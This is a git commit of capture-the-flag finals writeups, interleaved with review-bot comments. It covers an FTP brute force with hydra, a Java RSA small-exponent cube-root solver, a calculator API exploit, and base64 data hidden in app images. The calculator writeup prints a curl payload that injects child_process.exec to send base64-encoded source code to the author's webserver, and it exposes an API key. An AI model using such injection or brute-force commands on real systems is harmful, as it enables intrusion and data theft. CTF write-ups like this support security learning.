Commit 2adc34d4 authored by davit

Finals writeups

parent 24e0e2bd
We are given the IP of an FTP server. First thing to try is anonymous login, which worked. Ofcourse it was not that easy, and dumping all accessible files gave no flag. The server did contain a list of passwords and a list of username, so maybe we had to bruteforce the login?
Using hydra to bruteforce the FTP login (`hydra -l admin -P reversePasswords.list ftp://54.154.211.102:21 -vV -t 6 -I`) resulted in the `admin:cookies` credentials after ~20 minutes.
Login in as admin showed us a flag.txt file, containing the flag.
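Review bot: the hydra command on the second line takes `-l admin` and `-P reversePasswords.list`, but the text only mentions "a list of passwords and a list of username" found on the server. It never says how `reversePasswords.list` was derived from that list or why `admin` was chosen, so the step cannot be reproduced from the writeup; add a sentence for each. A closing line on the root cause (anonymous read access to the wordlists plus a dictionary password on the admin account) would make the writeup useful to whoever runs the server. Typos: "Ofcourse" should be "Of course", "list of username" should be "list of usernames", "Login in" should be "Logging in".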
import java.math.BigInteger;
public class Datacube {
public static final BigInteger TWO = BigInteger.valueOf(2);
public static final BigInteger FF = BigInteger.valueOf(0xff);
public static void main(String[] args) {
BigInteger n = new BigInteger("634504ee7770f969cfb8d9065fdbe37c58ca33640a0ee82f6d50b0b6a451a18519b83ff730a4fc00232f7244ebd1ec4f1608613fbfcf4838bfec5a53466898eca14a41ece3db9a79b8a7d7460075b45300a011485508210cc534dcb400eaf9c616de3dd0612db41cd0363a5c49269a17ee04be80b50da93a226949b88baceb7d576473e8a2ab0b6dd46073b2f80980e7b45a8b3421fefdfcbdfa8f8262340844a11bf1681b30405967992f5afb3891ad85289eb79ad7e3e71a0861af8eb1b9ebcc3d6d454a193fd78cf7cf496345e50ba516bf86e02f89c21c443a5b8908670860d2ddc6f", 16);
BigInteger c = new BigInteger("14aa1e31e4c5ddcc4da5bf7716da53a532f4bce4ab0cca7489f849981c14edfdc486122c4f74e3d3f0ca375161a8c58b067fdd886e4a3cb29d77a3b2c27580b31ba3b2bba50212df8467655a950257aef8df0591f4a81c82a12216408a5af9a5f988069c5c0b49a7966ea8370dcee275decbc1c081e66ea0c802e0aac8aa33b9ed8eebc55533270c442bbbc81507b40b8a8e36507322ef4ba1371346c0020866791319ac327ae4e87f0af13fbf8e800d4e918d40f6bc7e9534bc60617e3021d40470cb181f1a1da6b755f8cd2291f6249ad0be20024b649b6ba84de31ad4f43823192d048", 16);
BigInteger i = BigInteger.ZERO;
// i = BigInteger.valueOf(63000); // Start close to the solution
while(true) {
BigInteger attempt = n.multiply(i).add(c);
BigInteger root = cubeRoot(attempt);
if(root.pow(3).equals(attempt)) {
System.out.println(toASCII(root));
return;
}
if(i.mod(BigInteger.valueOf(1000)).equals(BigInteger.ZERO)) {
System.out.println(i);
}
i = i.add(BigInteger.ONE);
}
}
private static String toASCII(BigInteger value) {
int length = (value.bitLength() + 7)/8;
char[] chars = new char[length];
for(int i = length - 1; i >= 0; --i) {
chars[i] = (char) value.and(FF).intValue();
value = value.shiftRight(8);
}
return new String(chars);
}
/* Find x for which x^3 <= i < (x+1)^3 using binary search */
public static BigInteger cubeRoot(BigInteger i) {
BigInteger high = BigInteger.valueOf(2);
BigInteger low = BigInteger.ONE;
while (high.pow(3).compareTo(i) < 0) {
low = high;
high = high.multiply(TWO);
}
while (true) {
BigInteger mid = low.add(high).divide(TWO);
BigInteger p = mid.pow(3);
if (p.equals(i)) {
return mid;
}
if (mid.equals(low)) {
if (high.pow(3).equals(i)) {
return high;
}
return low;
}
if (p.compareTo(i) < 0) {
low = mid;
} else {
high = mid;
}
}
}
}
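Review bot: the `while(true)` loop in `main` has no upper bound on `i`, so if the `e=3` assumption is wrong the program runs forever with only the progress print every 1000 iterations; add a maximum and exit with a message when it is reached. The commented-out `i = BigInteger.valueOf(63000)` implies the solving index is already known, so record that value in the writeup and drop the dead line. `n` and `c` are hard-coded here and committed again as a separate data file, which lets the two copies drift; read them from the file or keep one copy. `toASCII` casts each byte straight to a `char`, which is only correct when the recovered plaintext is pure ASCII; a short comment saying so would help. Minor: the parameter of `cubeRoot` is named `i`, the same name `main` uses for the multiplier, which makes the doc comment harder to read.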
N = 634504ee7770f969cfb8d9065fdbe37c58ca33640a0ee82f6d50b0b6a451a18519b83ff730a4fc00232f7244ebd1ec4f1608613fbfcf4838bfec5a53466898eca14a41ece3db9a79b8a7d7460075b45300a011485508210cc534dcb400eaf9c616de3dd0612db41cd0363a5c49269a17ee04be80b50da93a226949b88baceb7d576473e8a2ab0b6dd46073b2f80980e7b45a8b3421fefdfcbdfa8f8262340844a11bf1681b30405967992f5afb3891ad85289eb79ad7e3e71a0861af8eb1b9ebcc3d6d454a193fd78cf7cf496345e50ba516bf86e02f89c21c443a5b8908670860d2ddc6f
c = 14aa1e31e4c5ddcc4da5bf7716da53a532f4bce4ab0cca7489f849981c14edfdc486122c4f74e3d3f0ca375161a8c58b067fdd886e4a3cb29d77a3b2c27580b31ba3b2bba50212df8467655a950257aef8df0591f4a81c82a12216408a5af9a5f988069c5c0b49a7966ea8370dcee275decbc1c081e66ea0c802e0aac8aa33b9ed8eebc55533270c442bbbc81507b40b8a8e36507322ef4ba1371346c0020866791319ac327ae4e87f0af13fbf8e800d4e918d40f6bc7e9534bc60617e3021d40470cb181f1a1da6b755f8cd2291f6249ad0be20024b649b6ba84de31ad4f43823192d048
We were given both C and N of an encrypted plaintext. Assuming RSA we know that `p^e = C+i*N` for a certain i. If `e=3` and p is relatively small, this is bruteforceable. Solution in Datacube.java.
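Review bot: in `p^e = C+i*N` the letter p stands for the plaintext, which collides with the conventional use of p for one of the RSA primes; use m for the message. The sentence says "Assuming RSA" and "If `e=3`" without stating that both were guesses that the solver confirmed, or at which `i` the cube root became exact; add that. It is also worth one line on why this works at all: the message was encrypted without padding, so m^3 is only slightly larger than N, and a padded message would not be recoverable this way.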
POST /foo/compute HTTP/1.1
Content-Type: application/json
x-api-key: 2fAAKhhAxA4WP3BnBbEui4zljRPb85Tk9OWvMZlj
Host: 3ogveoxr26.execute-api.eu-west-1.amazonaws.com
Content-Length: 91
Connection: close
{
"equation":"1+1"
}
\ No newline at end of file
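Review bot: the `x-api-key` header value is committed here in plain text, and the same key appears again in the curl commands of the accompanying writeup; if the key can still be used after the event, replace it with a placeholder before merging. `Content-Length: 91` also does not match the body shown, which is far shorter than 91 bytes; if the file is reproduced verbatim from the challenge, say so in the writeup, otherwise correct the header.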
We are given an example of how to query a calculator app in letsdance.txt .
Queries can be done with `curl https://3ogveoxr26.execute-api.eu-west-1.amazonaws.com/foo/compute -H "x-api-key: 2fAAKhhAxA4WP3BnBbEui4zljRPb85Tk9OWvMZlj" -v -H "Content-Type: application/json" --data '{"equation": "2+2"}'`.
The equation is eval'd, and the following command sends the flag base64 encoded to one of my webservers:
`curl https://3ogveoxr26.execute-api.eu-west-1.amazonaws.com/foo/compute -H "x-api-key: 2fAAKhhAxA4WP3BnBbEui4zljRPb85Tk9OWvMZlj" -v -H "Content-Type: application/json" --data "{\"equation\":\"typeof require('child_process').exec('curl https://my-website.be/FuckJeroenBlijfVanMijnPunten\$(cat index.js | grep -i CSC | base64)')\"}"`
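Review bot: the last command embeds the API key together with a personal callback hostname and a profane URL path; replace all three with placeholders before this goes into a shared repository. "The equation is eval'd" states the finding without saying how it was established, so add the observation that led to it. A sentence on the fix would make the writeup useful to the service owner as well: the `equation` field should go through an arithmetic-only expression parser instead of `eval`, and the function should not have the source file containing the flag readable alongside user input. Minor: there is a stray space before the full stop in "letsdance.txt .".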
We are given an apk. Trying to decompile results in obfuscated code, so let's first see what the application is trying to do. It turns out it generated ~500 images (see photos.zip). When calling `diff` on the hexdumps of the images, it becomes clear that each image is the same, except for the last few bytes that are appended and seem to be base64 encoded.
Flag found by running `strings * | grep $(echo -n "CSC" | base64) | base64 -d` in the photos directory.
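Review bot: the one-liner `strings * | grep $(echo -n "CSC" | base64) | base64 -d` only matches because "CSC" is exactly three bytes and sits at the very start of the encoded data; base64 output for a substring differs when it is not aligned on a 3-byte boundary, so say this in the text or readers will reuse the pattern where it silently finds nothing. Quote the substitution (`grep "$(...)"`) so the shell does not word-split it. The first paragraph says the app "generated ~500 images" but not how it was run or where the images were written, and the tense switches between past and present; one sentence on the setup would make the step reproducible.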